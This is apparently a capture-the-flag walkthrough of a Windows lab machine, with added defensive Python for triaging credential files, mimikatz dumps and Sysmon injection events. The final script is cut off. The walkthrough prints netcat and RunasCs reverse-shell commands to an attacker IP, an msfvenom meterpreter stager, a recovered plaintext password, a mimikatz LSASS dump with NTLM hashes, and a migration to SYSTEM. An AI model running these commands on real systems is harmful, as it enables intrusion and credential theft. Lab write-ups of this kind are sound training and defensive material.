C:\Users\sfitz\Videos\desktop.ini

-------- Exploring program directories and C:\ ---------
--- Program Files ---
Common Files
internet explorer
VMware
Windows Defender
Windows Defender Advanced Threat Protection

I find C:\Users\sfitz\Documents\connection.xml.
Its contents are as follows.

PS C:\Users\sfitz\Desktop> cat C:\Users\sfitz\Documents\connection.xml
cat C:\Users\sfitz\Documents\connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>

alaading's credential is visible. I tried John and the site below to recover it, but without success.

PSCredential

I did not really know how System.Management.Automation.PSCredential is encoded, so I asked GPT.
15.png
It gave me the answer, so I run it.
16.png
The password is visible! Now we should be able to move laterally!
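
Export-Clixml stores a PSCredential's password as a SecureString that, by default, is protected with the writing user's DPAPI key, which is why such a file is only recoverable in the context of the account that wrote it on the machine that wrote it. As an added example (not from the article), the following Python script hunts for these files and reports the user name, whether the password is stored as a SecureString, and whether the blob carries the standard DPAPI header (a blob produced with ConvertFrom-SecureString -Key would not, and is portable to anyone holding the key). The sample is constructed in the shape of connection.xml with a placeholder blob, not the real ciphertext.

```python
import os
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
# Hex prefix of a DPAPI CRYPTPROTECT blob; ConvertFrom-SecureString without
# -Key emits such a blob, bound to the writing user's DPAPI master key.
DPAPI_HEX_PREFIX = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

# Constructed sample in the shape of the connection.xml from the write-up.
# The <SS> value is a placeholder, not real ciphertext.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297ebPLACEHOLDER</SS>
    </Props>
  </Obj>
</Objs>
"""


def find_stored_credentials(xml_text):
    """Return one dict per PSCredential object in a CLIXML document:
    the user name, whether the password is a SecureString, and whether
    that SecureString is DPAPI-bound (as opposed to -Key encrypted)."""
    root = ET.fromstring(xml_text)
    found = []
    for obj in root.iter(PS_NS + "Obj"):
        type_names = {t.text for t in obj.iter(PS_NS + "T")}
        if "System.Management.Automation.PSCredential" not in type_names:
            continue
        props = obj.find(PS_NS + "Props")
        entry = {"username": None, "password_is_securestring": False, "dpapi_bound": False}
        for prop in (props if props is not None else []):
            if prop.get("N") == "UserName":
                entry["username"] = prop.text
            elif prop.get("N") == "Password" and prop.tag == PS_NS + "SS":
                blob = (prop.text or "").strip().lower()
                entry["password_is_securestring"] = bool(blob)
                entry["dpapi_bound"] = blob.startswith(DPAPI_HEX_PREFIX)
        found.append(entry)
    return found


def scan_directory(root_dir):
    """Walk root_dir and return (path, username, dpapi_bound) for every
    CLIXML file that holds a PSCredential. Export-Clixml on Windows
    PowerShell writes UTF-16 with a BOM by default, so decode on the BOM."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith((".xml", ".clixml")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    raw = fh.read()
                if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
                    text = raw.decode("utf-16")
                else:
                    text = raw.decode("utf-8-sig")
                if "schemas.microsoft.com/powershell" not in text[:512]:
                    continue
                for cred in find_stored_credentials(text):
                    hits.append((path, cred["username"], cred["dpapi_bound"]))
            except (OSError, UnicodeDecodeError, ET.ParseError):
                continue
    return hits


if __name__ == "__main__":
    for cred in find_stored_credentials(SAMPLE_CLIXML):
        print(cred)
```

From the defender's side the useful distinction is the last field: a DPAPI-bound blob is only as safe as the account that wrote it, which is exactly what a foothold as sfitz defeats here, so the fix is not a different encoding but not leaving a second user's credential in the first user's profile at all.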

Lateral Movement

runas

Once you have plaintext credentials, the first thing that comes to mind is the runas command.

PS C:\Users\sfitz\Desktop> runas /user:alaading "C:\windows\temp\nc.exe 10.10.14.83 7777 -e cmd"

I tried it first, but it did not work.
It skips right past the password prompt, so I suspected it simply would not work from this kind of CLI.

Start-Process

Next would be PowerShell's Start-Process command.

Run the following commands.

$password = ConvertTo-SecureString "f8gQ8fynP44ek1m3" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("alaading", $password)
Start-Process -NoNewWindow powershell "C:\windows\temp\nc.exe 10.10.14.83 7777 -e cmd" -Credential $cred

I tried various things, but none of them went through.

RunasCs

While researching runas, I found the repository below.

It is said to let you easily redirect output to a remote host, so I give it a try.

PS C:\Users\sfitz\Desktop> .\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.83:7777
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.83:7777

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-5777b$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3368 created in background.

PS C:\Users\sfitz\Desktop> 

19.png
It worked.
This gets us the user flag.

Privilege Escalation

SeDebugPrivilege

Check privileges.

PS C:\Users\alaading\Desktop> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Enabled 
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\alaading\Desktop> 

SeDebugPrivilege is enabled, so I will go after lsass.exe.
Time for mimikatz.

mimikatz

Run mimikatz.

PS C:\Users\alaading\Desktop> .\mimikatz.exe
.\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 2846665 (00000000:002b6fc9)
Session           : Batch from 0
User Name         : sfitz
Domain            : POV
Logon Server      : POV
Logon Time        : 3/1/2024 12:48:28 AM
SID               : S-1-5-21-2506154456-4081221362-271687478-1000
	msv :	
	 [00000003] Primary
	 * Username : sfitz
	 * Domain   : POV
	 * NTLM     : 012e5ed95e8745ea5180f81648b6ec94
	 * SHA1     : 535051ba0fbd3126b8e4f23dab348c1ff30b9f09
	 * DPAPI    : 535051ba0fbd3126b8e4f23dab348c1f
	tspkg :	
	wdigest :	
	 * Username : sfitz
	 * Domain   : POV
	 * Password : (null)
	kerberos :	
	 * Username : sfitz
	 * Domain   : POV
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 358267 (00000000:0005777b)
Session           : Batch from 0
User Name         : sfitz
Domain            : POV
Logon Server      : POV
Logon Time        : 2/29/2024 9:03:21 PM
SID               : S-1-5-21-2506154456-4081221362-271687478-1000
	msv :	
	 [00000003] Primary
	 * Username : sfitz
	 * Domain   : POV
	 * NTLM     : 012e5ed95e8745ea5180f81648b6ec94
	 * SHA1     : 535051ba0fbd3126b8e4f23dab348c1ff30b9f09
	 * DPAPI    : 535051ba0fbd3126b8e4f23dab348c1f
	tspkg :	
	wdigest :	
	 * Username : sfitz
	 * Domain   : POV
	 * Password : (null)
	kerberos :	
	 * Username : sfitz
	 * Domain   : POV
	 * Password : (null)
	ssp :	
	 [00000000]
	 * Username : alaading
	 * Domain   : (null)
	 * Password : f8gQ8fynP44ek1m3
	credman :	

Authentication Id : 0 ; 82775 (00000000:00014357)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/29/2024 9:02:31 PM
SID               : S-1-5-96-0-1
	msv :	
	tspkg :	
	wdigest :	
	 * Username : POV$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : POV$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2/29/2024 9:02:30 PM
SID               : S-1-5-20
	msv :	
	tspkg :	
	wdigest :	
	 * Username : POV$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : pov$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 52154 (00000000:0000cbba)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2/29/2024 9:02:29 PM
SID               : 
	msv :	
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 35319563 (00000000:021aef0b)
Session           : Interactive from 0
User Name         : alaading
Domain            : POV
Logon Server      : POV
Logon Time        : 3/2/2024 4:47:52 AM
SID               : S-1-5-21-2506154456-4081221362-271687478-1001
	msv :	
	 [00000003] Primary
	 * Username : alaading
	 * Domain   : POV
	 * NTLM     : 31c0583909b8349cbe92961f9dfa5dbf
	 * SHA1     : 3a8ce69bc0855496a9871aac1d4ba661a8fa0636
	 * DPAPI    : 3a8ce69bc0855496a9871aac1d4ba661
	tspkg :	
	wdigest :	
	 * Username : alaading
	 * Domain   : POV
	 * Password : (null)
	kerberos :	
	 * Username : alaading
	 * Domain   : POV
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2/29/2024 9:02:33 PM
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2/29/2024 9:02:32 PM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 85468 (00000000:00014ddc)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2/29/2024 9:02:32 PM
SID               : S-1-5-90-0-1
	msv :	
	tspkg :	
	wdigest :	
	 * Username : POV$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 53314 (00000000:0000d042)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/29/2024 9:02:29 PM
SID               : S-1-5-96-0-0
	msv :	
	tspkg :	
	wdigest :	
	 * Username : POV$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : POV$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2/29/2024 9:02:29 PM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : POV$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : pov$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

mimikatz #  

Nothing useful came out of it. The token::elevate command needs local administrator rights, so I'll stop here and try some other things.
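The dump above is the raw text mimikatz prints. As an added example (not code from the original write-up), here is a small parser that turns it into one record per logon session and reports which credential providers still hold cleartext secrets (wdigest, kerberos, ssp, credman) as opposed to hashes only (msv). The same triage is what a defender runs on an authorized test host to check that WDigest caching is disabled and that LSA Protection or Credential Guard actually keeps cleartext material out of LSASS. The SAMPLE dump below is constructed: fictitious users, hashes and passwords in the layout mimikatz uses.

```python
"""Triage a mimikatz ``sekurlsa::logonpasswords`` dump.

Added example, not code from the original write-up. It parses the dump
into one record per logon session and reports which credential providers
still hold cleartext secrets (wdigest/kerberos/ssp/credman) versus only
hashes (msv). SAMPLE is constructed: fictitious users, hashes and
passwords; indentation is spaces here where mimikatz prints tabs, the
parser strips either.
"""
import re

NULL = "(null)"
SESSION_START = "Authentication Id"
# A provider line looks like "\tmsv :\t" in the raw dump.
PROVIDER_RE = re.compile(r"^(msv|tspkg|wdigest|kerberos|ssp|credman) :$")


def parse_logonpasswords(text):
    """Return a list of sessions: header fields plus {provider: [entries]}."""
    sessions = []
    cur = provider = entry = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("mimikatz"):
            continue                       # blank lines and the prompt echo
        if line.startswith(SESSION_START):
            cur = {"providers": {}}
            sessions.append(cur)
            provider = entry = None
        if cur is None:
            continue                       # banner text before the first session
        m = PROVIDER_RE.match(line)
        if m:
            provider = m.group(1)
            cur["providers"][provider] = []
            entry = None
        elif line.startswith("[") and provider is not None:
            entry = {}                     # e.g. "[00000003] Primary"
            cur["providers"][provider].append(entry)
        elif line.startswith("* ") and provider is not None:
            key, _, value = line[2:].partition(":")
            if entry is None:              # wdigest/kerberos print no [..] header
                entry = {}
                cur["providers"][provider].append(entry)
            entry[key.strip()] = value.strip()
        elif provider is None and ":" in line:
            key, _, value = line.partition(":")   # session header field
            cur[key.strip()] = value.strip()
    return sessions


def find_cleartext(sessions):
    """(username, domain, provider, password) for every non-null password."""
    hits = []
    for s in sessions:
        for prov, entries in s["providers"].items():
            for e in entries:
                if e.get("Password", NULL) != NULL:
                    hits.append((e.get("Username"), e.get("Domain"), prov, e["Password"]))
    return hits


def find_ntlm(sessions):
    """(username, domain, ntlm) for every msv entry that carries an NT hash."""
    return [(e.get("Username"), e.get("Domain"), e["NTLM"])
            for s in sessions for e in s["providers"].get("msv", []) if e.get("NTLM")]


# Constructed sample dump (fictitious values, same layout as mimikatz output).
SAMPLE = """\
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 123456 (00000000:0001e240)
Session           : Batch from 0
User Name         : svc_task
Domain            : EXAMPLE
Logon Server      : EXAMPLE
Logon Time        : 1/1/2024 9:00:00 AM
SID               : S-1-5-21-1111111111-2222222222-3333333333-1001
    msv :
     [00000003] Primary
     * Username : svc_task
     * Domain   : EXAMPLE
     * NTLM     : 00112233445566778899aabbccddeeff
     * SHA1     : 0011223344556677889900aabbccddeeff001122
    tspkg :
    wdigest :
     * Username : svc_task
     * Domain   : EXAMPLE
     * Password : (null)
    kerberos :
     * Username : svc_task
     * Domain   : EXAMPLE
     * Password : (null)
    ssp :
     [00000000]
     * Username : helpdesk
     * Domain   : (null)
     * Password : Example-Pass-1
    credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : HOST$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 1/1/2024 8:00:00 AM
SID               : S-1-5-18
    msv :
    tspkg :
    wdigest :
     * Username : HOST$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos :
    ssp :
    credman :
"""

if __name__ == "__main__":
    sessions = parse_logonpasswords(SAMPLE)
    for s in sessions:
        print(f"{s['Domain']}\\{s['User Name']:<10} {s['Session']}")
    print("cleartext:", find_cleartext(sessions))
    print("ntlm:", find_ntlm(sessions))
```

Feed it a real dump file instead of SAMPLE and the ssp/wdigest hits are the sessions to explain: an ssp entry with a non-null password usually comes from a stored credential handed to a logon API (runas or a scheduled task), which is a cleanup item rather than something a registry setting removes.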

Metasploit

meterpreter

To get a meterpreter session, I build a stager.

┌──(root㉿kali)-[~/work]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.83 LPORT=4443 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

Run this on the box and catch it with the handler.

┌──(root㉿kali)-[~/work]
└─# msfconsole                                                                                        
Metasploit tip: Set the current module's RHOSTS with database values using 
hosts -R or services -R
                                                  
                                              `:oDFo:`                            
                                           ./ymM0dayMmy/.                          
                                        -+dHJ5aGFyZGVyIQ==+-                    
                                    `:sm⏣~~Destroy.No.Data~~s:`                
                                 -+h2~~Maintain.No.Persistence~~h+-              
                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`          
                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.      
                       -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-    
                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-  
                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:  
                      :we're.all.alike'`                     The.PFYroy.No.D7:  
                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:    
                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:    
                      :---srwxrwx:-.`                        `MS146.52.No.Per:    
                      :<script>.Ac816/                        sENbove3101.404:    
                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
                      :#OUTHOUSE-  -s:                       /corykennedyData:    
                      :$nmap -oS                              SSo.6178306Ence:    
                      :Awsm.da:                            /shMTl#beats3o.No.:    
                      :Ring0:                             `dDestRoyREXKC3ta/M:    
                      :23d:                               sSETEC.ASTRONOMYist:    
                       /-                        /yo-    .ence.N:(){ :|: & };:    
                                                 `:Shall.We.Play.A.Game?tron/    
                                                 ```-ooy.if1ghtf0r+ehUser5`    
                                               ..th3.H1V3.U2VjRFNN.jMh+.`          
                                              `MjM~~WE.ARE.se~~MMjMs              
                                               +~KANSAS.CITY's~-`                  
                                                J~HAKCERS~./.`                    
                                                .esc:wq!:`                        
                                                 +++ATH`                            
                                                  `


       =[ metasploit v6.3.55-dev                          ]
+ -- --=[ 2397 exploits - 1235 auxiliary - 422 post       ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search multi/handler

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/linux/local/apt_package_manager_persistence  1999-03-09       excellent  No     APT Package Manager Persistence
   1  exploit/android/local/janus                          2017-07-31       manual     Yes    Android Janus APK Signature bypass
   2  auxiliary/scanner/http/apache_mod_cgi_bash_env       2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   3  exploit/linux/local/bash_profile_persistence         1989-06-08       normal     No     Bash Profile Persistence
   4  exploit/linux/local/desktop_privilege_escalation     2014-08-07       excellent  Yes    Desktop Linux Password Stealer and Privilege Escalation
   5  exploit/multi/handler                                                 manual     No     Generic Payload Handler
   6  exploit/windows/mssql/mssql_linkcrawler              2000-01-01       great      No     Microsoft SQL Server Database Link Crawling Command Execution
   7  exploit/windows/browser/persits_xupload_traversal    2009-09-29       excellent  No     Persits XUpload ActiveX MakeHttpRequest Directory Traversal
   8  exploit/linux/local/yum_package_manager_persistence  2003-12-17       excellent  No     Yum Package Manager Persistence


Interact with a module by name or index. For example info 8, use 8 or use exploit/linux/local/yum_package_manager_persistence

msf6 > 
msf6 > use 5
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.83
LHOST => 10.10.14.83
msf6 exploit(multi/handler) > set LPORT 4443
LPORT => 4443
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.83:4443 
[*] Sending stage (201798 bytes) to 10.10.11.251
[*] Meterpreter session 1 opened (10.10.14.83:4443 -> 10.10.11.251:50099) at 2024-03-02 08:09:50 -0500

First, a quick try with getsystem.

meterpreter > getsystem
[-] stdapi_sys_config_getuid: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter >

No luck.

local_exploit_suggester

Let's have it suggest some exploits for us.

meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > search suggest

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank       Check  Description
   -  ----                                                  ---------------  ----       -----  -----------
   0  auxiliary/server/icmp_exfil                                            normal     No     ICMP Exfiltration Service
   1  exploit/windows/browser/ms10_018_ie_behaviors         2010-03-09       good       No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
   2  post/multi/recon/local_exploit_suggester                               normal     No     Multi Recon Local Exploit Suggester
   3  auxiliary/scanner/http/nagios_xi_scanner                               normal     No     Nagios XI Scanner
   4  post/osx/gather/enum_colloquy                                          normal     No     OS X Gather Colloquy Enumeration
   5  post/osx/manage/sonic_pi                                               normal     No     OS X Manage Sonic Pi
   6  exploit/multi/http/torchserver_cve_2023_43654         2023-10-03       excellent  Yes    PyTorch Model Server Registration and Deserialization RCE
   7  exploit/windows/http/sharepoint_data_deserialization  2020-07-14       excellent  Yes    SharePoint DataSet / DataTable Deserialization
   8  exploit/windows/smb/timbuktu_plughntcommand_bof       2009-06-25       great      No     Timbuktu PlughNTCommand Named Pipe Buffer Overflow


Interact with a module by name or index. For example info 8, use 8 or use exploit/windows/smb/timbuktu_plughntcommand_bof

msf6 exploit(multi/handler) > use 2
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.11.251 - Collecting local exploits for x64/windows...
[*] 10.10.11.251 - 193 exploit checks are being tried...
[+] 10.10.11.251 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.11.251 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.251 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.251 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.11.251 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.11.251 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 45 / 45
[*] 10.10.11.251 - Valid modules for session 2:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/cve_2022_21882_win32k                    Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 7   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 8   exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 9   exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.
 10  exploit/windows/local/bypassuac_dotnet_profiler                No                       The target is not exploitable.
 11  exploit/windows/local/bypassuac_eventvwr                       No                       The target is not exploitable.
 12  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 13  exploit/windows/local/bypassuac_sdclt                          No                       The target is not exploitable.

 ...(omitted)

For now, I'll try the ones marked Yes.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_sluihijack
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_sluihijack) > show options

Module options (exploit/windows/local/bypassuac_sluihijack):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/bypassuac_sluihijack) > set SESSION 2
SESSION => 2
msf6 exploit(windows/local/bypassuac_sluihijack) > set LHOST 10.10.14.83
LHOST => 10.10.14.83
msf6 exploit(windows/local/bypassuac_sluihijack) > run

[*] Started reverse TCP handler on 10.10.14.83:4444 
[*] UAC is Enabled, checking level...
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_sluihijack) > 

That doesn't seem to work either.

migrate

Let's try migrating to another process.
I'll try a parent process.

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User          Path
 ---   ----  ----               ----  -------  ----          ----
 0     0     [System Process]
 4     0     System             x64   0
 68    620   svchost.exe        x64   0                      C:\Windows\System32\svchost.exe
 88    4     Registry           x64   0
 288   4     smss.exe           x64   0
 320   620   svchost.exe        x64   0                      C:\Windows\System32\svchost.exe
 376   368   csrss.exe          x64   0
 480   368   wininit.exe        x64   0
 488   472   csrss.exe          x64   1
 496   1324  powershell.exe     x64   0                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 548   472   winlogon.exe       x64   1                      C:\Windows\System32\winlogon.exe
 620   480   services.exe       x64   0

 ...(omitted)

 3736  776   WmiPrvSE.exe       x64   0                      C:\Windows\System32\wbem\WmiPrvSE.exe
 3840  1816  powershell.exe     x64   0                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 3872  548   LogonUI.exe        x64   1                      C:\Windows\System32\LogonUI.exe
 3900  848   chisel.exe         x64   0                      C:\Windows\Temp\chisel.exe
 4000  1524  conhost.exe        x64   0                      C:\Windows\System32\conhost.exe
 4288  1172  powershell.exe     x64   0                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 4324  776   wsmprovhost.exe    x64   0        POV\alaading  C:\Windows\System32\wsmprovhost.exe
 4360  3368  conhost.exe        x64   0        POV\alaading  C:\Windows\System32\conhost.exe
 4644  1816  conhost.exe        x64   0                      C:\Windows\System32\conhost.exe
 4660  620   svchost.exe        x64   0                      C:\Windows\System32\svchost.exe
 4728  3312  cmd.exe            x86   0                      C:\Windows\SysWOW64\cmd.exe
 4844  4288  runas.exe          x64   0                      C:\Windows\System32\runas.exe
 4872  620   svchost.exe        x64   0                      C:\Windows\System32\svchost.exe
 4908  620   svchost.exe        x64   0                      C:\Windows\System32\svchost.exe
 4956  620   svchost.exe        x64   0                      C:\Windows\System32\svchost.exe
 4964  620   svchost.exe        x64   0                      C:\Windows\System32\svchost.exe
 5052  620   svchost.exe        x64   0                      C:\Windows\System32\svchost.exe

meterpreter > 

Let's try PID 776.

meterpreter > migrate 776
[*] Migrating from 996 to 776...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Wait, that's SYSTEM!
Now I can read the root flag.
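The migration above moved the session from a process running as alaading (PID 996) into PID 776, which getuid then reports as NT AUTHORITY\SYSTEM. For a non-administrator, opening a SYSTEM process with the rights needed to write code into it and start a thread normally fails the process object's DACL check; it succeeds when the caller's token holds SeDebugPrivilege, which is why that privilege has to be treated as equivalent to SYSTEM (the write-up does not show the account's privileges, so that this is what happened here is my assumption). On the detection side, the injection leaves two Sysmon records: Event ID 10 (ProcessAccess) for the handle and Event ID 8 (CreateRemoteThread) for the thread. The following is an added example, not code from the write-up: a rule that flags both when a non-SYSTEM user targets a SYSTEM process. The records are constructed and flattened to key="value" pairs (SourceUser/TargetUser exist since Sysmon 13); the PIDs and account name mirror the migration shown above, the image paths are assumed.

```python
"""Detect cross-user thread injection into SYSTEM processes.

Added example, not from the write-up. It evaluates Sysmon-style records:
Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess), whose
SourceUser/TargetUser fields exist since Sysmon 13. The records in
SAMPLE_EVENTS are constructed and flattened to key="value" pairs; the
PIDs and account name mirror the migration in the write-up, the image
paths are assumed.
"""
import re

# Access rights (winnt.h) that together allow writing code into another
# process and starting a thread on it, which is what a migrate needs.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

SYSTEM_USERS = {"NT AUTHORITY\\SYSTEM"}
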